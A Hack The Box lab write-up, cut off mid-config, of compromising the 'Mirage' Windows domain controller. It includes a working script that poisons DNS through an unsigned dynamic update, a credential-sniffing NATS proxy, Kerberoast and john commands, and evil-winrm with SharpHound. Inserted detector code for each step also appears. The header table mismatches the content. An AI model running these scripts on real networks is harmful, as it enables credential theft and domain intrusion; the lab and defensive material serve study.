
💻 Platform | Hack The Box |
🔗 Link | click here |
🖥️ Operating system | Linux |
🎯 Difficulty | Hard |
🧠 TTPs (tactics and techniques) | Service enumeration (Enumeration); analysing web pages and exploiting LFI; extracting credentials from back-end files; exploiting phpLiteAdmin (CVE-2019-9283); accessing the machine over SSH; privilege escalation via a local exploit |
1. Enumeration
Nmap scan
We start with nmap: a comprehensive scan, letting it run over all ports with -p-. We use -A -sCV so it gives us technical details on the services (OS, version, and script results). This step gives us an initial "map".
`nmap -A -T4 -p- -Pn -sCV -vvv -oN mirage.nmap $Machine_IP`
# Nmap 7.95 scan initiated Sun Jul 20 00:08:09 2025 as: /usr/lib/nmap/nmap -A -T4 -p- -Pn -sCV -vvv -oN mirage.nmap 10.129.60.250
Increasing send delay for 10.129.60.250 from 5 to 10 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.129.60.250 (10.129.60.250)
Host is up, received user-set (0.053s latency).
Scanned at 2025-07-20 00:08:09 CET for 226s
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-20 06:10:13Z)
111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after: 2105-07-04T19:58:41
| MD5: da96:ee88:7537:0dcf:1bd4:4aa3:2104:5393
| SHA-1: c25a:58cc:950f:ce6e:64c7:cd40:e98e:bb5a:653f:b9ff
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
2049/tcp open nlockmgr syn-ack ttl 127 1-4 (RPC #100021)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
4222/tcp open vrml-multi-use? syn-ack ttl 127
| fingerprint-strings:
| GenericLines:
| INFO {"server_id":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","server_name":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":145,"client_ip":"10.10.x.x","xkey":"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A"}
| -ERR 'Authorization Violation'
| GetRequest:
| INFO {"server_id":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","server_name":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":146,"client_ip":"10.10.x.x","xkey":"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A"}
| -ERR 'Authorization Violation'
| HTTPOptions:
| INFO {"server_id":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","server_name":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":147,"client_ip":"10.10.x.x","xkey":"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A"}
| -ERR 'Authorization Violation'
| NULL:
| INFO {"server_id":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","server_name":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":144,"client_ip":"10.10.x.x","xkey":"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A"}
|_ -ERR 'Authentication Timeout'
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49436/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49443/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49444/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49459/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51947/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51964/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51975/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57464/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Uptime guess: 0.099 days (since Sat Jul 19 21:49:31 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 55724/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46309/tcp): CLEAN (Couldn't connect)
| Check 3 (port 42844/udp): CLEAN (Timeout)
| Check 4 (port 46560/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-20T06:11:16
|_ start_date: N/A
|_clock-skew: 6h59m58s
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 51.51 ms 10.10.14.1 (10.10.14.1)
2 54.34 ms 10.129.60.250 (10.129.60.250)
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 20 00:11:55 2025 -- 1 IP address (1 host up) scanned in 225.66 seconds
- AD services: 88, 389, 445
- DNS: 53
- NFS: 2049 (a bit unusual on Windows)
- NATS server: 4222
- WinRM: 5985 (remote management on Windows)
🎯 The key observation: NFS + DNS = a chance to find sensitive files or to abuse name resolution.
NFS Mounts
➜ Mirage showmount -e 10.129.60.250
Export list for 10.129.60.250:
/MirageReports (everyone)
With a simple showmount we were able to discover that the server shares the folder /MirageReports over the NFS protocol. That means anyone can mount it and take what is inside, which is a clear security mistake.
➜ Mirage sudo mount -t nfs 10.129.60.250:/MirageReports /mnt
➜ Mirage sudo cp /mnt/* ./
➜ Mirage ls
Incident_Report_Missing_DNS_Record_nats-svc.pdf Mirage_Authentication_Hardening_Report.pdf mirage.htb_ips.txt mirage.nmap passwords.txt users.txt
We mounted the share. The files we found:
Incident_Report_Missing_DNS_Record_nats-svc.pdf
Mirage_Authentication_Hardening_Report.pdf
These documents appear to contain internal information, most likely with a lead for the next stage. Let's open them and see what we can get out of them.


In this challenge, one of the PDFs contains a report about a missing DNS record (Missing DNS Record), and that point is the key.
Here is what is going on:
The general idea:
The server uses internal DNS to reach a service named, for example, nats-svc.mirage.htb, but in this context there was no definition for that DNS name in /etc/hosts or in the external DNS.
When the server tries to resolve the name, it goes out looking for it over the network, and that is where you can answer it with a forged reply!
What exactly did we exploit?
- The server depends on a DNS lookup for a specific service.
- There is no official record, so you can spoof the DNS request.
- When you answer it, it trusts you and sends its request to you.
- At that point you can answer it with a config file, or hand it a payload (for example one containing credentials, or a path containing a shell).
The tools we need:
- Set up a fake DNS server tool (for example dnschef, responder, or even dig + named.conf)
- Let the victim machine come and ask, and we answer that the server is at an IP we control (ours)
- From there, we move into exploiting the service (for example a web interface, or an SSH config…)
```python
import dns.update
import dns.query

# Target DNS server and domain
dns_server = '10.129.105.223'
domain = 'mirage.htb.'
record = 'nats-svc'
ip = '10.10.14.39'

# Build the update request
update = dns.update.Update(domain)  # No TSIG, completely unsigned
update.add(record, 300, 'A', ip)

# Send it
response = dns.query.tcp(update, dns_server)
print("Response:")
print(response)
```
What is happening here?
- The target server runs an internal DNS (10.129.105.223)
- You register a new record in it (with no security signature)
- You add an A record named nats-svc.mirage.htb pointing to your IP (10.10.14.39)
The result: any program on the server that tries to resolve nats-svc.mirage.htb lands on your IP.
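As an added example (not part of the original writeup), here is the defender-side counterpart of the script above: a small hand-written DNS wire parser that inspects UPDATE messages and flags those carrying no TSIG record, built against the same zone and record. The sample message is constructed inline with the names from this box, and nothing is sent on the network.

```python
import struct

OPCODE_UPDATE = 5            # RFC 2136 dynamic update
TYPE_A, TYPE_SOA, TYPE_TSIG = 1, 6, 250


def encode_name(name):
    """Encode a dotted name such as "nats-svc.mirage.htb." into wire-format labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(buf, off):
    """Decode a wire-format name, following compression pointers (RFC 1035 4.1.4)."""
    labels, end = [], None
    for _ in range(128):                      # bounded so a pointer loop cannot hang us
        length = buf[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0 == 0xC0:             # compression pointer
            if end is None:
                end = off + 2
            off = struct.unpack_from("!H", buf, off)[0] & 0x3FFF
            continue
        labels.append(buf[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length
    return ".".join(labels) + ".", (end if end is not None else off)


def decode_rr(buf, off):
    """Decode one resource record; returns (rr_dict, offset_after_rr)."""
    name, off = decode_name(buf, off)
    rtype, _rclass, ttl, rdlen = struct.unpack_from("!HHIH", buf, off)
    off += 10
    return {"name": name, "type": rtype, "ttl": ttl, "rdata": buf[off:off + rdlen]}, off + rdlen


def build_unsigned_update(zone, record, ip, ttl=300):
    """Constructed sample: the wire form of an unsigned UPDATE adding one A record,
    i.e. what dnspython emits for Update(zone).add(record, ttl, 'A', ip) with no keyring."""
    header = struct.pack("!HHHHHH", 0x1337, OPCODE_UPDATE << 11, 1, 0, 1, 0)
    zone_section = encode_name(zone) + struct.pack("!HH", TYPE_SOA, 1)
    rdata = bytes(int(octet) for octet in ip.split("."))
    update_rr = (encode_name(record + "." + zone)
                 + struct.pack("!HHIH", TYPE_A, 1, ttl, len(rdata)) + rdata)
    return header + zone_section + update_rr


def inspect_dns_message(buf):
    """Return {"zone", "signed", "changes"} for an UPDATE message, None for anything else."""
    _ident, flags, zocount, prcount, upcount, adcount = struct.unpack_from("!HHHHHH", buf, 0)
    if (flags >> 11) & 0xF != OPCODE_UPDATE or zocount != 1:
        return None
    zone, off = decode_name(buf, 12)
    off += 4                                  # ZTYPE and ZCLASS
    for _ in range(prcount):                  # prerequisites are irrelevant to this check
        _rr, off = decode_rr(buf, off)
    changes = []
    for _ in range(upcount):
        rr, off = decode_rr(buf, off)
        if rr["type"] == TYPE_A and len(rr["rdata"]) == 4:
            changes.append((rr["name"], ".".join(str(b) for b in rr["rdata"])))
        else:
            changes.append((rr["name"], "type %d" % rr["type"]))
    signed = False
    for _ in range(adcount):                  # a TSIG RR, when present, sits in ADDITIONAL
        rr, off = decode_rr(buf, off)
        signed = signed or rr["type"] == TYPE_TSIG
    return {"zone": zone, "signed": signed, "changes": changes}


def alerts_for(buf):
    """One alert per record changed by an unsigned UPDATE; signed updates and
    ordinary queries produce no alert."""
    finding = inspect_dns_message(buf)
    if finding is None or finding["signed"]:
        return []
    return ["unsigned UPDATE to zone %s adds %s -> %s" % (finding["zone"], name, value)
            for name, value in finding["changes"]]


if __name__ == "__main__":
    sample = build_unsigned_update("mirage.htb.", "nats-svc", "10.10.14.39")
    for alert in alerts_for(sample):
        print(alert)
```

Fed from a capture of port 53 on the domain controller, the same logic shows whether the zone is accepting unsigned dynamic updates, which is the setting that makes this hijack possible.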
MITM Proxy on port 4222 (NATS)
```python
import socket
import threading

# Local proxy server binds here
LISTEN_HOST = '0.0.0.0'
LISTEN_PORT = 4222
# Real NATS server
REAL_HOST = '10.129.105.223'
REAL_PORT = 4222


def handle_client(client_sock):
    # Connect to real NATS server
    remote_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remote_sock.connect((REAL_HOST, REAL_PORT))

    def forward(src, dst):
        # Copy bytes one way, printing each chunk, until either side closes
        while True:
            try:
                data = src.recv(4096)
                if not data:
                    break
                print(f"[DATA] {data.decode(errors='ignore')}")
                dst.sendall(data)
            except Exception:
                break
        src.close()
        dst.close()

    threading.Thread(target=forward, args=(client_sock, remote_sock)).start()
    threading.Thread(target=forward, args=(remote_sock, client_sock)).start()


def start_proxy():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((LISTEN_HOST, LISTEN_PORT))
    server.listen(5)
    print(f"[+] Proxy listening on {LISTEN_HOST}:{LISTEN_PORT}")
    while True:
        client_sock, addr = server.accept()
        print(f"[+] Connection from {addr}")
        threading.Thread(target=handle_client, args=(client_sock,)).start()


if __name__ == "__main__":
    start_proxy()
```
The idea:
- You open a socket on your machine on port 4222 (the same port the NATS service uses)
- When the server tries to connect to nats-svc.mirage.htb:4222 (now that DNS points to you), it lands on you
- Your program forwards the traffic between the victim and the real server (proxy)
- At the same time, it prints the traffic so you can see credentials or secrets
➜ Mirage python proxy.py
[+] Proxy listening on 0.0.0.0:4222
[+] Connection from ('10.129.60.250', 62791)
[DATA] INFO {"server_id":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","server_name":"NCZP6SSJGGEWEKHMADN3HO3AB2SFVUC67KSFE67R75BKDL3PSLIGPTN6","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":304,"client_ip":"10.10.14.2","xkey":"XBB7UBHM5SUEXPWR2ZVUVEIRYXY7YYMNHR4P3R24L67IQML7JC5DTK7A"}
[DATA] CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5***********337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":true,"no_responders":true}
[DATA] PING
[DATA] PONG
[DATA] PING
[DATA] PONG
[DATA] PING
[DATA] PONG
[DATA] PING
What did we see in the traffic?
Credentials in the clear, served on a silver platter:
- 👤 Username: Dev_Account_A
- 🔐 Password: hx5***********337! (you get the full one in reality)

What does this mean?
When the server connects to the service (NATS) it sends the credentials without encryption, and since you did a MITM (man-in-the-middle) via DNS, you could see them.
Which raises the question: where can we use this user/pass?
Usually, such credentials:
- are reused on other systems (SSH, web interface, DB…)
- or have direct privileges on the system
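Added example, not from the original writeup: a parser for the NATS text protocol seen in the proxy output above, run over a constructed capture (made-up server id and passwords, same shape as the real traffic). It flags an INFO that demands authentication without TLS, a CONNECT carrying user/pass over a cleartext connection, and a published message on logs.auth whose body holds a password, redacting the secrets in its report.

```python
import json

# Constructed capture modelled on the proxy output above; server id, passwords and
# client id are made up. Payload size is computed so the PUB frame is well formed.
AUTH_LOG = '{"user":"david.jjackson","password":"example-pass-2","ip":"10.10.10.20"}'
CAPTURE = "".join([
    'INFO {"server_id":"NEXAMPLE","server_name":"NEXAMPLE","version":"2.11.3","proto":1,'
    '"host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,'
    '"max_payload":1048576,"jetstream":true,"client_id":304}\r\n',
    'CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"example-P4ss!",'
    '"tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","protocol":1}\r\n',
    'PING\r\n', 'PONG\r\n',
    'PUB logs.auth %d\r\n' % len(AUTH_LOG), AUTH_LOG + '\r\n',
    'PING\r\n',
])

SECRET_KEYS = {"password", "pass", "passwd", "pwd", "secret", "token", "auth_token"}


def parse_frames(capture):
    """Split a NATS text capture into (verb, args, payload) frames. PUB and MSG frames
    carry their payload on the following line; payloads with embedded CRLF are not
    handled (assumption made for this example)."""
    lines = capture.split("\r\n")
    frames, i = [], 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line:
            continue
        verb, _, args = line.partition(" ")
        payload = None
        if verb in ("PUB", "MSG"):
            payload = lines[i] if i < len(lines) else ""
            i += 1
        frames.append((verb, args, payload))
    return frames


def redact(secret):
    """Keep only the first and last three characters so the report never stores a secret."""
    if len(secret) <= 6:
        return "***"
    return secret[:3] + "*" * (len(secret) - 6) + secret[-3:]


def audit_nats_capture(capture):
    """Return human-readable findings for credential exposure in a NATS session."""
    findings = []
    tls_required = False
    for verb, args, payload in parse_frames(capture):
        if verb == "INFO":
            info = json.loads(args)
            tls_required = bool(info.get("tls_required"))
            if info.get("auth_required") and not tls_required:
                findings.append("server %s v%s requires authentication but not TLS: "
                                "credentials will cross the wire in cleartext"
                                % (info.get("server_name"), info.get("version")))
        elif verb == "CONNECT" and not tls_required:
            opts = json.loads(args)
            if "auth_token" in opts:
                findings.append("cleartext CONNECT with auth_token %s" % redact(opts["auth_token"]))
            if "user" in opts and "pass" in opts:
                findings.append("cleartext CONNECT for user %s (pass %s) by client %r"
                                % (opts["user"], redact(opts["pass"]), opts.get("name")))
        elif verb in ("PUB", "MSG") and payload:
            subject = args.split()[0]
            try:
                body = json.loads(payload)
            except ValueError:
                continue                      # not JSON, nothing to inspect here
            if isinstance(body, dict):
                leaked = sorted(k for k in body if k.lower() in SECRET_KEYS)
                if leaked:
                    findings.append("subject %s carries credential field(s) %s for user %s"
                                    % (subject, ",".join(leaked), body.get("user", "?")))
    return findings


if __name__ == "__main__":
    for finding in audit_nats_capture(CAPTURE):
        print(finding)
```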
➜ Mirage nats stream ls -s 'nats://Dev_Account_A:hx5**********337!@10.129.221.101:4222'
╭─────────────────────────────────────────────────────────────────────────────────╮
│ Streams │
├───────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name │ Description │ Created │ Messages │ Size │ Last Message │
├───────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ auth_logs │ │ 2025-05-05 08:18:19 │ 5 │ 570 B │ 76d1h47m20s │
╰───────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯
➜ Mirage nats stream info auth_logs -s 'nats://Dev_Account_A:hx5h7F5554fP@1337!@10.129.221.101'
Information for Stream auth_logs created 2025-05-05 08:18:19
Subjects: logs.auth
Replicas: 1
Storage: File
Options:
Retention: Limits
Acknowledgments: true
Discard Policy: New
Duplicate Window: 2m0s
Direct Get: true
Allows Msg Delete: false
Allows Purge: false
Allows Rollups: false
Limits:
Maximum Messages: 100
Maximum Per Subject: unlimited
Maximum Bytes: 1.0 MiB
Maximum Age: unlimited
Maximum Message Size: unlimited
Maximum Consumers: unlimited
Metadata:
_nats.level: 1
_nats.req.level: 0
_nats.ver: 2.11.3
State:
Messages: 5
Bytes: 570 B
First Sequence: 1 @ 2025-05-05 08:18:56 UTC
Last Sequence: 5 @ 2025-05-05 08:19:27 UTC
Active Consumers: 0
Number of Subjects: 1
➜ Mirage nats stream get auth_logs --last-for logs.auth -s 'nats://Dev_Account_A:hx5h7F5554fP@1337!@10.129.221.101:4222'
Item: auth_logs#5 received 2025-05-05 07:19:27.2106658 +0000 UTC on Subject logs.auth
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
➜ Mirage nxc ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --users
LDAP dc01.mirage.htb 389 DC01 [*] None (name:DC01) (domain:mirage.htb) (signing:None) (channel binding:Never) (NTLM:False)
LDAP dc01.mirage.htb 389 DC01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
LDAP dc01.mirage.htb 389 DC01 [*] Enumerated 10 domain users: mirage.htb
LDAP dc01.mirage.htb 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP dc01.mirage.htb 389 DC01 Administrator 2025-06-23 22:18:18 0 Built-in account for administering the computer/domain
LDAP dc01.mirage.htb 389 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP dc01.mirage.htb 389 DC01 krbtgt 2025-05-01 08:42:23 0 Key Distribution Center Service Account
LDAP dc01.mirage.htb 389 DC01 Dev_Account_A 2025-05-27 15:05:12 0
LDAP dc01.mirage.htb 389 DC01 Dev_Account_B 2025-05-02 09:28:11 1
LDAP dc01.mirage.htb 389 DC01 david.jjackson 2025-05-02 09:29:50 0
LDAP dc01.mirage.htb 389 DC01 javier.mmarshall 2025-05-25 19:44:43 0 Contoso Contractors
LDAP dc01.mirage.htb 389 DC01 mark.bbond 2025-06-23 22:18:18 0
LDAP dc01.mirage.htb 389 DC01 nathan.aadam 2025-06-23 22:18:18 0
LDAP dc01.mirage.htb 389 DC01 svc_mirage 2025-05-22 21:37:45 0 Old service account migrated by contractors
➜ Mirage impacket-GetUserSPNs 'mirage.htb/david.jjackson:pN8kQmn6b86!1234@' -dc-ip 10.129.221.101 -dc-host dc01.mirage.htb -k -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ ------------ ------------------------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/exchange.mirage.htb nathan.aadam CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb 2025-06-23 22:18:18.584667 2025-07-04 21:01:43.511763
[-] CCache file is not found. Skipping...
$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$4e436f77918a8ad94985d03da3b0713c$…
john
➜ Mirage john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3edc#EDC3 (?)
1g 0:00:00:04 DONE (2025-07-20 11:01) 0.2288g/s 2853Kp/s 2853Kc/s 2853KC/s 3er733..3ddfiebw
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
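Added example (not part of the original writeup): detection logic for the Kerberoast step above, run over constructed Event ID 4769 records in JSON-lines form. The field names follow the Windows security log, the account names are taken from the LDAP enumeration above, and every other value is made up. It flags RC4 (0x17) service tickets issued for user accounts and a single requester sweeping several service accounts.

```python
import json
from collections import defaultdict

RC4_HMAC = "0x17"
ETYPE_NAMES = {"0x11": "AES128-CTS-HMAC-SHA1-96", "0x12": "AES256-CTS-HMAC-SHA1-96",
               "0x17": "RC4-HMAC", "0x18": "RC4-HMAC-EXP"}

# Constructed sample events (JSON lines). Account names come from the enumeration
# above; the SPN assignments, addresses and the failed request are invented.
SAMPLE_EVENTS = """\
{"EventID":4768,"TargetUserName":"david.jjackson","ServiceName":"krbtgt","TicketEncryptionType":"0x12","IpAddress":"::ffff:10.10.14.2","Status":"0x0"}
{"EventID":4769,"TargetUserName":"david.jjackson@MIRAGE.HTB","ServiceName":"nathan.aadam","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.10.14.2","Status":"0x0"}
{"EventID":4769,"TargetUserName":"mark.bbond@MIRAGE.HTB","ServiceName":"DC01$","TicketEncryptionType":"0x12","IpAddress":"::ffff:10.10.10.20","Status":"0x0"}
{"EventID":4769,"TargetUserName":"david.jjackson@MIRAGE.HTB","ServiceName":"krbtgt","TicketEncryptionType":"0x12","IpAddress":"::ffff:10.10.14.2","Status":"0x0"}
{"EventID":4769,"TargetUserName":"david.jjackson@MIRAGE.HTB","ServiceName":"svc_mirage","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.10.14.2","Status":"0x0"}
{"EventID":4769,"TargetUserName":"nathan.aadam@MIRAGE.HTB","ServiceName":"svc_mirage","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.10.10.20","Status":"0xe"}
{"EventID":4769,"TargetUserName":"david.jjackson@MIRAGE.HTB","ServiceName":"Dev_Account_B","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.10.14.2","Status":"0x0"}
"""


def parse_events(text):
    """Yield 4769 (TGS request) events from JSON lines; other IDs and bad lines are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except ValueError:
            continue
        if event.get("EventID") == 4769:
            yield event


def is_roastable_request(event):
    """A successful TGS request for a user-account SPN encrypted with RC4: the ticket
    can be cracked offline against that account's password, as with nathan.aadam."""
    service = event.get("ServiceName", "")
    return (event.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and event.get("Status", "0x0") == "0x0"
            and not service.endswith("$")         # machine accounts have random passwords
            and service.lower() != "krbtgt")


def detect_kerberoast(text, sweep_threshold=3):
    """Return one finding per roastable request plus one per requester that asked for
    RC4 tickets to at least sweep_threshold distinct service accounts."""
    findings = []
    services_by_requester = defaultdict(set)
    for event in parse_events(text):
        if not is_roastable_request(event):
            continue
        requester = event["TargetUserName"].split("@")[0]
        services_by_requester[requester].add(event["ServiceName"])
        findings.append("%s TGS for user-account SPN %s requested by %s from %s"
                        % (ETYPE_NAMES[RC4_HMAC], event["ServiceName"], requester,
                           event.get("IpAddress", "?")))
    for requester, services in sorted(services_by_requester.items()):
        if len(services) >= sweep_threshold:
            findings.append("%s requested RC4 tickets for %d distinct service accounts (%s): "
                            "likely Kerberoast sweep"
                            % (requester, len(services), ", ".join(sorted(services))))
    return findings


if __name__ == "__main__":
    for finding in detect_kerberoast(SAMPLE_EVENTS):
        print(finding)
```

On the remediation side, the same logic goes quiet once service accounts carry AES-only msDS-SupportedEncryptionTypes and long random passwords, which is what the cracked 3edc#EDC3 password lacked.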
Evil-Winrm
We get the user flag here.
➜ Mirage evil-winrm -i dc01.mirage.htb -r mirage.htb
*Evil-WinRM* PS C:\temp> Import-Module c:\temp\SharpHound.ps1
*Evil-WinRM* PS C:\temp> Invoke-BloodHound -CollectionMethod All -OutPutDirectory c:\temp -Domain MIRAGE.HTB
*Evil-WinRM* PS C:\temp> ls
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/20/2025 8:56 AM 39887 20250720085615_BloodHound.zip
-a---- 7/20/2025 3:31 AM 51712 RunasCs.exe
-a---- 7/20/2025 8:51 AM 1594261 SharpHound.ps1
-a---- 7/20/2025 3:41 AM 10156032 winPEASany.exe
*Evil-WinRM* PS C:\temp> download 20250720085615_BloodHound.zip
Info: Downloading C:\temp\20250720085615_BloodHound.zip to 20250720085615_BloodHound.zip
Info: Download successful!
winPEAS
*Evil-WinRM* PS C:\Program Files\Nats-Server> cat nats-server.conf
listen: '0.0.0.0:4222'
jetstream: {
store_dir: 'C:\Program Files\Nats-Server\tmp'
}
accounts: {
'$SYS': {
users: [
